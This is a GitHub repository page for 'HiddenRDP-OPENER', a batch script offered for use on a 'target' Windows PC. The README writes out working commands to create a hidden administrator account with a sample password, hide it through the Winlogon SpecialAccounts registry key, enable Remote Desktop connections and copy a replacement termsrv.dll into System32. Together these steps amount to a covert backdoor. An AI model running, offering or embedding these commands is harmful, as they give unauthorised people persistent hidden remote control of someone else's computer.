Skip to content

This script make any windows compatible with RDP connection

Notifications You must be signed in to change notification settings

Adityamw011/HiddenRDP-OPENER

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 

Repository files navigation

HiddenRDP-OPENER

This script make any windows compatible with RDP connection

Requirements :

Windows 7 , Windows 8 , Windows 10 / Not tested yet in Windows XP

How it works ?:

This script create a hidden profil ( Administrator privilege ) and change registry parametre to make windows compatible with RDP Connection.

Configuration:

You need to open RDPScript.bat with your editor (in your pc)
And make this changes :

net user hidden 123123 /ADD

hidden = name of your created account
123123 = password of your account

xcopy "termsrv.dll" "%windir%\System32\" /s /h /q

change termsrv.dll with your full path (in pc target) , ex : C:\Users\comix\Downloads\termsrv.dll
move termsrv.dll,RDPScript.bat in the pc target

Delete configuration

Change this value in RDPScript.bat to delete the hidden profile from

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Hidden /t REG_DWORD /d 0X00000000 /f

To

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Hidden /t REG_DWORD /d 0X00000001 /f

then you will be able to see your hidden profil And change this line

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0X00000000 /f

to

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0X00000001 /f

License

Copyright © 2019 Soufiyan Ak (Comix)

About

This script make any windows compatible with RDP connection

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Batchfile 100.0%